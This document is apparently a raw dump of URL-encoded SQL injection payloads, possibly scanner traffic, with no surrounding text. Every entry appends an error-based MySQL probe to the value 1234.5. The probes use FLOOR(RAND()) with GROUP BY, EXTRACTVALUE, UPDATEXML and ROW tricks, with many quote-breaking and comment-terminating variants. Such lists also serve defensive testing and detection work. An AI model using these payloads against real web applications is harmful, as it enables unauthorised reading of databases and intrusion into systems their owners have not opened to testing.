1234.5%20WHERE%203557%3D3557%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27dphb%27%20FROM%20DUAL%20WHERE%202180%3D2180%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27VwNI%27%20WHERE%203195%3D3195%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20IZwu%20WHERE%202559%3D2559%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27bKAA%27%20WHERE%207544%3D7544%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%20%28SELECT%207632%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287632%3D7632%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%23 1234.5%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29 1234.5%27%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29 1234.5%27%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29 1234.5%22%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29 1234.5%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%283351%3D3351 1234.5%29%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%281995%3D1995 1234.5%29%29%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%287240%3D7240 1234.5%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29 1234.5%27%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%27uSne%27%3D%27uSne 1234.5%27%29%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%27zzmD%27%3D%27zzmD 1234.5%27%29%29%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%28%27vUzt%27%3D%27vUzt 1234.5%27%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%27aHLm%27%3D%27aHLm 1234.5%27%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%27QpeT%27%20LIKE%20%27QpeT 1234.5%27%29%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%27vQRw%27%20LIKE%20%27vQRw 1234.5%27%29%29%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%28%27IsbL%27%20LIKE%20%27IsbL 1234.5%27%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%27tDvG%27%20LIKE%20%27tDvG 1234.5%22%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%22DGab%22%3D%22DGab 1234.5%22%29%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%22Bgqm%22%3D%22Bgqm 1234.5%22%29%29%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%28%22opZw%22%3D%22opZw 1234.5%22%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%22mzkw%22%3D%22mzkw 1234.5%22%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%22HdTE%22%20LIKE%20%22HdTE 1234.5%22%29%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%22Epps%22%20LIKE%20%22Epps 1234.5%22%29%29%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%28%22lODd%22%20LIKE%20%22lODd 1234.5%22%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%22YwSq%22%20LIKE%20%22YwSq 1234.5%25%27%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%27SJMA%27%3D%27SJMA 1234.5%00%27%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%27gswA%27%3D%27gswA 1234.5%27%29%20WHERE%204293%3D4293%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20--%20 1234.5%22%29%20WHERE%208986%3D8986%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20--%20 1234.5%29%20WHERE%208364%3D8364%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20--%20 1234.5%27%20WHERE%203251%3D3251%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20--%20 1234.5%22%20WHERE%208293%3D8293%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20--%20 1234.5%20WHERE%208874%3D8874%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27uyoF%27%20FROM%20DUAL%20WHERE%202283%3D2283%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27NVSS%27%20WHERE%201452%3D1452%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20pioe%20WHERE%202748%3D2748%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27WRpi%27%20WHERE%206186%3D6186%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%20EXTRACTVALUE%281113%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%281113%3D1113%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20%23 1234.5%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29 1234.5%27%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29 1234.5%27%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29 1234.5%22%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29 1234.5%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%289904%3D9904 1234.5%29%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%285170%3D5170 1234.5%29%29%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%28%284317%3D4317 1234.5%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29 1234.5%27%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%27wOeI%27%3D%27wOeI 1234.5%27%29%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%28%27OoFZ%27%3D%27OoFZ 1234.5%27%29%29%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%28%28%27xvzC%27%3D%27xvzC 1234.5%27%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%27EJEe%27%3D%27EJEe 1234.5%27%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%27OoCC%27%20LIKE%20%27OoCC 1234.5%27%29%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%28%27YMZF%27%20LIKE%20%27YMZF 1234.5%27%29%29%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%28%28%27aSLP%27%20LIKE%20%27aSLP 1234.5%27%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%27SJfY%27%20LIKE%20%27SJfY 1234.5%22%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%22IqKx%22%3D%22IqKx 1234.5%22%29%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%28%22cFiQ%22%3D%22cFiQ 1234.5%22%29%29%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%28%28%22QWBQ%22%3D%22QWBQ 1234.5%22%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%22PkZp%22%3D%22PkZp 1234.5%22%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%22cVdY%22%20LIKE%20%22cVdY 1234.5%22%29%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%28%22itZm%22%20LIKE%20%22itZm 1234.5%22%29%29%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%28%28%22ipRY%22%20LIKE%20%22ipRY 1234.5%22%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%22cPFz%22%20LIKE%20%22cPFz 1234.5%25%27%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%28%27Bssy%27%3D%27Bssy 1234.5%00%27%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20AND%20%27bnls%27%3D%27bnls 1234.5%27%29%20WHERE%207766%3D7766%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20--%20 1234.5%22%29%20WHERE%209606%3D9606%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20--%20 1234.5%29%20WHERE%209073%3D9073%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20--%20 1234.5%27%20WHERE%204001%3D4001%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20--%20 1234.5%22%20WHERE%202260%3D2260%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20--%20 1234.5%20WHERE%203602%3D3602%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27nYQG%27%20FROM%20DUAL%20WHERE%202948%3D2948%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27TxeT%27%20WHERE%208186%3D8186%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20htfb%20WHERE%205119%3D5119%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27ImLo%27%20WHERE%203655%3D3655%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%20UPDATEXML%289773%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289773%3D9773%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C4993%29%20%23 1234.5%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29 1234.5%27%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29 1234.5%27%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29 1234.5%22%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29 1234.5%29%20AND%20ROW%285067%2C9404%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%285067%3D5067%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205771%20UNION%20SELECT%208556%20UNION%20SELECT%208644%20UNION%20SELECT%202069%29a%20GROUP%20BY%20x%29%20AND%20%285334%3D5334 